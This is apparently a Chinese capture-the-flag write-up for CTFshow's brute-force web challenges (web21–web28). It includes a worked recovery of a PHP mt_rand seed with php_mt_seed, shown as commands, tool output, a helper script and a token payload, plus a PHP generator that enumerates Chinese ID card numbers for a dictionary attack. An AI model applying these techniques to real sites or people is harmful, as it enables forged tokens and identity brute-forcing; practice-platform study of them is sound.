SSS
- web21_爆破什么的,都是基操
- web22_域名也可以爆破的,试试爆破这个ctf.show的子域名
- web23_还爆破?这么多代码,告辞!
- web24_爆个🔨
- web25_爆个🔨,不爆了
- web26_这个可以爆
- web27_CTFshow菜鸡学院招生啦!
- web28_大海捞针
web21_爆破什么的,都是基操
web22_域名也可以爆破的,试试爆破这个ctf.show的子域名
web23_还爆破?这么多代码,告辞!
使用php爆破
web24_爆个🔨
按照随机数种子规则进行脚本编写,注意,php版本不同,运行随机数种子的结果也会有所不同。
web25_爆个🔨,不爆了
https://www.openwall.com/php_mt_seed/ https://www.cnblogs.com/zaqzzz/p/9997855.html mt_scrand(seed)这个函数的意思,是通过分发seed种子,然后种子有了后,靠mt_rand()生成随机 数。 在之前自己还以为需要暴力破解cookie,最后师傅们给我介绍了一个脚本,专门用来跑mt_srand()种子和 mt_rand()随机数的 这里自己解释一下为什么每一次的mt_rand()+mt_rand()不是第一次的随机数相加?? 因为生成的随机数可以说是一个线性变换(实际上非常复杂)的每一次的确定的但是每一次是不一样的,所以不能 进行第一次*2就得到mt_rand()+mt_rand() 使用说只要我们得到种子就可以在本地进行获得自己想要的值 解题:通过随机数来寻找种子 我们让 ?r=0 得到随机数。这里我得到的是 183607393 每一次不一样(因为flag值在变化) 然后下载 php_mt_seed4.0 我们在linux下面使用 gcc进行编译 gcc php_mt_seed.c -o php_mt_seed 之后运行脚本添加随机数 ./php_mt_seed 183607393
找到对应的版本这里自己的运气好第一个出来的自己验证了一下发现就是这个 注:可能存在多个种子需要自己进行判断 通过种子找到第一个随机数就是上面的随机数。
payload: ?r=183607393 Cookie: token=794171094
使用php_mt_seed解析随机数种子,下载并且make编译后使用。
┌──(root?kali)-[/data/tools/php_mt_seed-4.0]
└─# time ./php_mt_seed 1432475889
Pattern: EXACT
Version: 3.0.7 to 5.2.0
Found 0, trying 0xac000000 - 0xafffffff, speed 12546.4 Mseeds/s
seed = 0xad49eaf6 = 2907302646 (PHP 3.0.7 to 5.2.0)
seed = 0xad49eaf7 = 2907302647 (PHP 3.0.7 to 5.2.0)
Found 2, trying 0xfc000000 - 0xffffffff, speed 12811.7 Mseeds/s
Version: 5.2.1+
Found 2, trying 0x08000000 - 0x09ffffff, speed 130.3 Mseeds/s
seed = 0x081a9537 = 135959863 (PHP 5.2.1 to 7.0.x; HHVM)
Found 3, trying 0x32000000 - 0x33ffffff, speed 149.0 Mseeds/s
seed = 0x323b389c = 842741916 (PHP 5.2.1 to 7.0.x; HHVM)
Found 4, trying 0x36000000 - 0x37ffffff, speed 149.3 Mseeds/s
seed = 0x36029329 = 906138409 (PHP 5.2.1 to 7.0.x; HHVM)
Found 5, trying 0x46000000 - 0x47ffffff, speed 149.6 Mseeds/s
seed = 0x47d7e597 = 1205331351 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0x47d7e597 = 1205331351 (PHP 7.1.0+)
Found 7, trying 0xfe000000 - 0xffffffff, speed 136.8 Mseeds/s
Found 7
real 31.77s
user 125.93s
sys 0.07s
cpu 396%
<?php
$r = 0;
mt_srand(0x47d7e597);
echo "随机数种子:0x47d7e597\n " ;
$rand1 = mt_rand();
echo "第一个随机数:$rand1\n" ;
$randRet = intval($r)-intval($rand1) ;
echo $randRet ;
$rand23 = mt_rand()+mt_rand();
echo "第二三个随机数之和: $rand23\n" ;
?>
web26_这个可以爆
web27_CTFshow菜鸡学院招生啦!
# 身份证遍历算法,制作成字典
<?php
$card = array();
for ($y=1990; $y < 2000; $y++) {
for ($m=0; $m < 13; $m++) {
if ($m<10) {
$m='0'.$m;
}
for ($d=0; $d <32 ; $d++) {
if ($d < 10) {
$d='0'.$d;
}
array_push($card, '621022'.$y.$m.$d.'5237');
}
}
}
function checkCard($c) {
$list = [7,9,10,5,8,4,2,1,6,3,7,9,10,5,8,4,2];
$crc = [1,0,'X',9,8,7,6,5,4,3,2];
$ca = str_split($c);
$sum = 0;
for ($i=0; $i < count($ca); $i++) {
$sum += $ca[$i]*$list[$i];
}
$crc_ = $sum%11;
if ($ca[count($ca)-1]==$crc[$crc_]) {
return true;
} else {
return false;
}
}
foreach ($card as $c) {
if (checkCard($c)) {
echo $c.'<br >';
}
}
?>
web28_大海捞针
